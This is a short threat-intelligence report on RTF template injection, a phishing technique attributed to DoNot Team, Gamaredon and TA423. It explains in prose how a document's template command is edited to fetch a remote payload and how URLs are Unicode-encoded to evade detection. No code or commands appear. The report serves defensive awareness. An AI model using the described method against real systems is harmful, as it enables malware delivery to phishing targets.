Various state-sponsored threat actors have been observed using a new method called RTF template injection in their recent phishing campaigns as a way to deliver malware to their targeted systems.
The Rich Text Format (RTF) document format was created by Microsoft and can be opened using Microsoft Word, WordPad, and other applications found on nearly all operating systems. This attack works by abusing the RTF template feature that exists within the format. These templates specify how text in the document should be formatted and are generally hosted locally on the system. Threat actors, however, have found a way to force the template to retrieve a URL resource instead, thus allowing them to use the template feature to download malware on to a system. Modifying an RTF document in such a way is simple, as it only requires modifying the hex of the document to include the template command along with a URL that hosts a secondary payload. Likewise, RTF documents support Unicode parsing, so threat actors can further evade detection by converting plaintext URLs to Unicode within the RTF document.
Three state-sponsored threat actors have been seen using this technique over the past year: the India-based group DoNot Team, the Russian-backed Gamaredon group, and the Chinese threat actor TA423. Samples obtained from these groups show mixed results when it comes to obfuscating the URLs with Unicode; samples have shown that the DoNot Team have opted for obfuscating URLs, whereas Gamardeon and TA423 have opted instead for plaintext URLs within the RTF files. Threat researchers believe that this technique will continue to be adopted by new threat actors, as its effectiveness and ease of use makes it an efficient attack.